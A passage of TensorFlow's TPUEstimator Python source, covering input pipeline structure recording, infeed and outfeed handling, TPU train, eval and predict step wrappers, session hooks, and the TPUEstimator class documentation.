`labels` need to be flattened, before infeed enqueue, and the structure of
them needs to be recorded, in order to restore them after infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors mismatches expected num. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
# Perform some sanity checks to log user friendly information. We should
# error out to give users better error message. But, if
# _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
# user code, so, log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(
key, tensor))
return predictions
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
Before running the graph on TPU, TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
Current limitations:
--------------------
1. Outside compilation does not work yet (b/79991729).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
